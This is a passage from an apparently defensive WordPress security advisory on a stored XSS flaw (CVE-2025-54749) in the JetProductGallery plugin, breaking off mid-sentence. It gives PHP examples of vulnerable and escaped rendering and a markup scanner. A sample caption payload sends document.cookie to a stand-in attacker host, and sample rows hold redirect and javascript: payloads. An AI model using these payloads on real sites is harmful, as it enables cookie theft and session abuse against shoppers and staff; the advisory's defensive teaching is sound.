| Plugin Name | JetProductGallery |
|---|---|
| Type of Vulnerability | Cross-Site Scripting (XSS) |
| CVE Number | CVE-2025-54749 |
| Urgency | Low |
| CVE Publish Date | 2025-08-14 |
| Source URL | CVE-2025-54749 |
Urgent: JetProductGallery (<= 2.2.0.2) XSS (CVE-2025-54749) — What WordPress Site Owners Must Do Now
TL;DR — Quick summary
A publicly disclosed Cross‑Site Scripting (XSS) vulnerability (CVE-2025-54749) affects the JetProductGallery plugin for WooCommerce when the installed plugin version is 2.2.0.2 or lower. The vendor released an update in version 2.2.0.3 that fixes the issue. The vulnerability allows a user with Contributor privileges to inject malicious HTML/JavaScript that could execute in other users’ browsers when product pages or gallery components are viewed.
If you operate a WordPress site that uses JetProductGallery:
- Update the plugin to 2.2.0.3 or later immediately (the vendor patch is the primary fix).
- If you cannot update right away, apply mitigations: tighten contributor privileges, scan for injected scripts, deploy virtual patches via your WAF or server filters, and enable runtime protections like Content Security Policy (CSP) to reduce impact.
- Review the site for signs of compromise, check logs, and restore from a clean backup if you find evidence of malicious code.
This advisory explains the risk, realistic attack scenarios, immediate steps to take, detection methods, and longer‑term hardening measures — from the perspective of a Hong Kong security practitioner familiar with e‑commerce and multi‑vendor environments.
Background: What we know about the issue
- Vulnerability type: Cross‑Site Scripting (XSS)
- Affected software: JetProductGallery (Jet Woo Product Gallery plugin)
- Affected versions: <= 2.2.0.2
- Fixed in: 2.2.0.3
- CVE: CVE-2025-54749
- Reported by: security researcher (public disclosure)
- Required attacker privileges: Contributor (able to add products or modify product-related content)
- CVSS (reported): 6.5 (Medium), reflecting stored content injection that requires an authenticated Contributor account
Stored (persistent) XSS on an e‑commerce site is high‑impact for customer trust and safety. The distinguishing factor here is that a Contributor‑level account, the lowest role that can author content, can inject payloads that persist on product pages and fire for every visitor, including logged‑in staff. That is a realistic risk in marketplaces, agency stores, and multi‑author catalogs common across Hong Kong and the region.
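To make the bug class concrete, here is an added PHP example (not code from the JetProductGallery plugin or from this advisory) showing a Contributor‑supplied gallery caption rendered without escaping beside the hardened form. The field names, markup and sample payload are hypothetical; the `esc_*` fallbacks exist only so the file runs outside WordPress, where the real functions are defined.

```php
<?php
// Added example, not code from the JetProductGallery plugin or the advisory.
// It models the bug class only: a Contributor-supplied gallery caption written
// into HTML as saved. Field names, markup and the payload are constructed.

// Fallbacks so this runs outside WordPress. Inside WordPress the real
// esc_attr()/esc_html()/esc_url() already exist and these are skipped.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Crude stand-in for the real esc_url(): allow only http(s) URLs and
    // escape them for attribute context.
    function esc_url(string $s): string {
        return preg_match('#^https?://#i', $s) ? esc_attr($s) : '';
    }
}

// Vulnerable pattern: the caption lands in an attribute and in element text
// exactly as the Contributor saved it.
function render_gallery_item_vulnerable(array $item): string {
    return '<figure class="gallery-item">'
        . '<img src="' . $item['src'] . '" alt="' . $item['caption'] . '">'
        . '<figcaption>' . $item['caption'] . '</figcaption>'
        . '</figure>';
}

// Hardened pattern: escape each value for the context it is written into
// (URL, attribute, text). This is the usual fix for this bug class.
function render_gallery_item_hardened(array $item): string {
    return '<figure class="gallery-item">'
        . '<img src="' . esc_url($item['src']) . '" alt="' . esc_attr($item['caption']) . '">'
        . '<figcaption>' . esc_html($item['caption']) . '</figcaption>'
        . '</figure>';
}

// Constructed sample: a caption a malicious Contributor might save. It closes
// the alt attribute and injects an element carrying an event handler.
$item = [
    'src'     => 'https://shop.example/wp-content/uploads/2025/08/shirt.jpg',
    'caption' => '"><img src=x onerror="location=\'https://attacker.example/?\'+document.cookie">',
];

echo "VULNERABLE:\n", render_gallery_item_vulnerable($item), "\n\n";
echo "HARDENED:\n", render_gallery_item_hardened($item), "\n";
```

Run it with `php example.php` and compare the two outputs: the vulnerable version emits a live `<img onerror=…>` inside the figure, the hardened version prints the payload as inert text. Note why input filtering alone is not enough: Contributors lack the `unfiltered_html` capability, so WordPress runs kses over `post_content` they save, but plugin‑specific fields (captions stored as post meta, values saved through a plugin's own handler) are only sanitized if the plugin does it. Output escaping is the defence that does not depend on where the data came from.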
Why this matters — realistic attack paths
An attacker who can create or edit product content (Contributor role or similar) could:
- Inject script tags into gallery captions, image metadata, custom fields, or other product fields the plugin renders without proper escaping.
- Use injected scripts to redirect users to phishing pages, display rogue overlay content, or act within the victim's session. HttpOnly cookies cannot be read from script, but the script can still issue authenticated requests (for example to the REST API or admin-ajax.php using the victim's nonce) as whoever is viewing the page, including a shop manager or administrator previewing the product.
- Load additional malicious resources (trackers, stealer scripts) or trigger unwanted browser actions against users.
- Persist payloads so they trigger whenever product pages or galleries are viewed, rapidly exposing visitors at scale.
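The attack paths above all depend on markup that should never appear in Contributor‑authored product content. As an added example (not from the advisory, the plugin vendor, or any scanner it names), the following PHP flags those carriers in rows pulled from `wp_posts` and `wp_postmeta`. The sample rows are constructed and the `_gallery_caption` meta key is hypothetical; on a live site you would build `$rows` from `$wpdb` as the comment shows.

```php
<?php
// Added example, not part of the original advisory or the plugin. Scans
// content rows for markup used by stored-XSS payloads. The sample rows are
// constructed; the meta key name is hypothetical.

// Returns the names of every suspicious pattern found in $value.
function find_suspicious_markup(string $value): array {
    $patterns = [
        'script_tag'     => '/<\s*script\b/i',
        'event_handler'  => '/\bon[a-z]+\s*=/i',                                   // onerror=, onload=, ...
        'js_uri'         => '/\b(?:href|src|action)\s*=\s*["\']?\s*javascript:/i',
        'data_html_uri'  => '/data:\s*text\/html/i',
        'iframe_object'  => '/<\s*(?:iframe|object|embed)\b/i',
        'meta_refresh'   => '/<\s*meta\b[^>]*http-equiv\s*=\s*["\']?refresh/i',   // redirect carrier
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Each row: table, id, field, author (post_author), value. Returns only rows
// with at least one hit so the output is a review list, not a dump.
function scan_rows(array $rows): array {
    $findings = [];
    foreach ($rows as $row) {
        $hits = find_suspicious_markup((string) $row['value']);
        if ($hits) {
            $findings[] = [
                'table'  => $row['table'],
                'id'     => $row['id'],
                'field'  => $row['field'],
                'author' => $row['author'] ?? null,
                'hits'   => $hits,
            ];
        }
    }
    return $findings;
}

// On a live site (e.g. `wp eval-file scan.php`) build $rows from queries like
//   $wpdb->get_results("SELECT ID, post_author, post_excerpt, post_content
//                       FROM {$wpdb->posts} WHERE post_type = 'product'", ARRAY_A);
//   $wpdb->get_results("SELECT meta_id, post_id, meta_key, meta_value
//                       FROM {$wpdb->postmeta}", ARRAY_A);
// Constructed sample rows standing in for that output:
$rows = [
    ['table' => 'wp_posts',    'id' => 101,  'field' => 'post_excerpt',     'author' => 7,
     'value' => 'Soft cotton shirt in navy.'],
    ['table' => 'wp_postmeta', 'id' => 5531, 'field' => '_gallery_caption', 'author' => 7,
     'value' => '"><img src=x onerror="location=\'https://attacker.example/login\'">'],
    ['table' => 'wp_posts',    'id' => 102,  'field' => 'post_content',     'author' => 3,
     'value' => '<a href="javascript:alert(1)">See sizes</a>'],
    ['table' => 'wp_postmeta', 'id' => 5540, 'field' => '_thumbnail_id',    'author' => 3,
     'value' => '2231'],
];

foreach (scan_rows($rows) as $f) {
    printf("%s #%d %s (author %s): %s\n",
        $f['table'], $f['id'], $f['field'], $f['author'], implode(', ', $f['hits']));
}
```

Two of the four sample rows are reported (the caption with an event handler, and the `javascript:` link); the clean excerpt and the numeric meta value are not. Treat hits as leads, not verdicts: a legitimate embed or a theme shortcode can trip `iframe_object`, so review each flagged row against its author's role and the revision history before cleaning it.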
Immediate actions (first 1–24 hours)
- Update JetProductGallery to 2.2.0.3 or later. This is the primary and definitive fix. Update from WordPress admin (Plugins → Installed Plugins → Update) or via WP‑CLI:

```shell
wp plugin update jet-woo-product-gallery
```

Verify the plugin slug in your installation (it is the plugin's folder name under wp-content/plugins/) and replace the slug in the command if it differs.
- If you cannot update immediately, deploy compensating controls. Apply server or WAF rules to block or sanitize script tags and suspicious payloads in product-related requests and in the fields the plugin renders (gallery captions, image titles, product meta). Treat such rules as a stopgap: request filtering can be bypassed with encoding tricks and does not restore the missing output escaping. Block POST/PUT requests containing